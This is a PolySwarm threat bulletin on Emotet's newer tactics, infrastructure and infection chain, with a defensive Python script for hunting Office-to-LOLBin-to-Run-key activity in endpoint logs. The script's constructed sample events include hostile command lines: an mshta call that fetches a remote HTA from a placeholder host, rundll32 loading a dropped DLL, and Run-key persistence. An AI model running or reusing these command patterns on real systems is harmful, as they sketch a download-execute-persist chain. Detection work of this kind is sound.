The PolySwarm Blog


Emotet Observed Using New TTPs

Oct 20, 2022 11:06:46 AM / by PolySwarm Tech Team


Related Families: TrickBot, Ryuk, QakBot, Zloader, Quantum, BlackCat

Verticals Targeted: Financial, Various

Executive Summary

VMware recently reported on the evolution of Emotet. New Emotet TTPs include added functionality, new anti-analysis techniques, infrastructure changes, and new attack vectors.

Key Takeaways

  • Emotet has evolved TTPs since its return in late 2021.
  • Emotet was originally a banking trojan but now also acts as a botnet and a loader.
  • Other changes to Emotet include new functionalities, new anti-analysis techniques, infrastructure changes, and new attack vectors.

What is Emotet?

The Emotet banking trojan, first seen in the wild in 2014, was once considered the “world’s most dangerous malware.” Previous versions of Emotet were extremely dangerous because they spread quickly, were difficult to detect, and were sometimes used by other threat actor groups to install ransomware, stealers, and other malware. The threat actors behind Emotet built an elaborate infrastructure to support it, the notorious Emotet botnet.

Emotet was considered dead after its takedown by law enforcement groups in January 2021. Although leftover samples existed in the wild, there was no network infrastructure to support them. In November 2021, Emotet activity was again observed in the wild. Emotet now primarily functions as a botnet and a loader as a service (LaaS). Last month, industry researchers reported that ransomware as a service (RaaS) groups, including Quantum and BlackCat, are leveraging Emotet.

How Has Emotet Evolved?

VMware reported multiple changes indicating the evolution of Emotet’s TTPs:

Functionality Added

Emotet has new modules that allow threat actors to steal credit card information from the Google Chrome browser and to use SMB to spread laterally within a network.

Anti-Analysis

The threat actors behind Emotet are obscuring their C2 infrastructure, making analysis more difficult. More recent Emotet variants use a new method of storing the configuration data (including C2 addresses) within the binary, so existing configuration extractors need to be updated to recover it.

Infrastructure Changes

VMware noted a shift in Emotet’s infrastructure, with the current versions using two botnet clusters known as Epoch 4 and Epoch 5. VMware researchers examined 23,811 DLL payloads and discovered 328 unique C2 IP addresses used by Emotet. The majority belonged to Epoch 4, with just under 40% belonging to Epoch 5; one IP address overlapped both botnets. Splitting C2 across two botnets provides redundancy and makes the activity harder to track. The C2 ports most commonly used by Emotet are 8080 and 443.

New Attack Vectors

VMware noted that Emotet has been using both malicious URLs embedded in emails and malicious Microsoft Office documents as initial infection vectors. Some attacks relied on Excel documents containing macros. The macros download the next-stage payload (a DLL), execute it with rundll32.exe, and establish persistence through the registry. Infections observed earlier this year used mshta.exe instead. mshta.exe is a legitimate Windows utility that executes Microsoft HTML Application (HTA) files, which makes it a common living-off-the-land binary (LOLBin) for launching a payload without dropping a conventional executable.
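The delivery chain above (Office document, macro, rundll32.exe or mshta.exe, registry persistence) is visible in endpoint telemetry even when the payload itself is new. The following is an added example, not PolySwarm or VMware code, of hunting that chain in process-creation and registry-write events. The event shape is a simplified Sysmon-like layout and the sample events, paths and hostnames are constructed for illustration; the rules are the author’s own heuristics, not a published Emotet signature.

```python
"""Hunt the Office -> LOLBin -> Run-key chain in constructed endpoint events.

Added example; not PolySwarm or VMware code. Event fields loosely mirror
Sysmon Event ID 1 (process create) and Event ID 13 (registry value set).
All sample data below is constructed, not captured from a real infection.
"""
import re

# Constructed events. Paths, SIDs and URLs are hypothetical.
SAMPLE_EVENTS = [
    # 1. Excel macro launches rundll32 on a DLL dropped into %TEMP%
    {"type": "process", "id": 1,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\stage2.dll,Control_RunDLL"},
    # 2. rundll32 writes a Run value so the DLL survives a reboot
    {"type": "registry", "id": 2,
     "image": r"C:\Windows\System32\rundll32.exe",
     "target": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\stage2",
     "details": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\stage2.dll,Control_RunDLL"},
    # 3. Word launches mshta against a remote HTA
    {"type": "process", "id": 3,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://example.invalid/loader.hta"},
    # 4. Benign: Windows itself runs rundll32 on a System32 DLL
    {"type": "process", "id": 4,
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    # 5. Benign: a vendor installer registers its own agent in the Run key
    {"type": "registry", "id": 5,
     "image": r"C:\Program Files\Vendor\setup.exe",
     "target": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Vendor",
     "details": r"C:\Program Files\Vendor\agent.exe"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
LOLBINS = {"rundll32.exe", "mshta.exe"}  # the two binaries named in the report

# Locations a macro can write to without elevation; a DLL or HTA loaded
# from here by a signed Windows binary is worth a look.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\AppData\\|\\Users\\[^\\]+\\Downloads\\|\\ProgramData\\|\\Temp\\",
    re.I,
)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
HTA_URL = re.compile(r"\bhttps?://\S+\.hta\b", re.I)


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule_name, event_id) pairs for every rule an event trips."""
    hits = []
    for ev in events:
        img = basename(ev["image"])
        if ev["type"] == "process":
            # Office applications have no business spawning these binaries.
            if basename(ev["parent_image"]) in OFFICE_APPS and img in LOLBINS:
                hits.append(("office_spawns_lolbin", ev["id"]))
            # rundll32 loading a DLL from a user-writable directory.
            if img == "rundll32.exe" and USER_WRITABLE.search(ev["cmdline"]):
                hits.append(("rundll32_user_writable_dll", ev["id"]))
            # mshta pulling an HTA from a URL or from a dropped file.
            if img == "mshta.exe" and (
                HTA_URL.search(ev["cmdline"]) or USER_WRITABLE.search(ev["cmdline"])
            ):
                hits.append(("mshta_remote_or_dropped_hta", ev["id"]))
        elif ev["type"] == "registry":
            # Persistence: a LOLBin, not an installer, writing a Run value.
            if RUN_KEY.search(ev["target"]) and img in LOLBINS:
                hits.append(("lolbin_run_key_persistence", ev["id"]))
    return hits


if __name__ == "__main__":
    for rule, event_id in detect(SAMPLE_EVENTS):
        print(f"{rule:32s} event {event_id}")
```

Events 1 through 3 each trip at least one rule, while the two benign events are silent. Correlating the hits by host and time (an Office parent, then a LOLBin loading from a user-writable path, then a Run-key write from that same LOLBin) gives far higher confidence than any single rule; the C2 ports noted in the infrastructure section (8080 and 443) are too common on their own to be a useful filter and are better used to pivot on the specific IP addresses once a host is flagged.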


PolySwarm has multiple samples associated with new Emotet activity.

You can use the following CLI command to search for all Emotet samples in our portal:

$ polyswarm link list -f Emotet


Topics: Threat Bulletin, Banking, Loader, Trojan, Botnet, Emotet
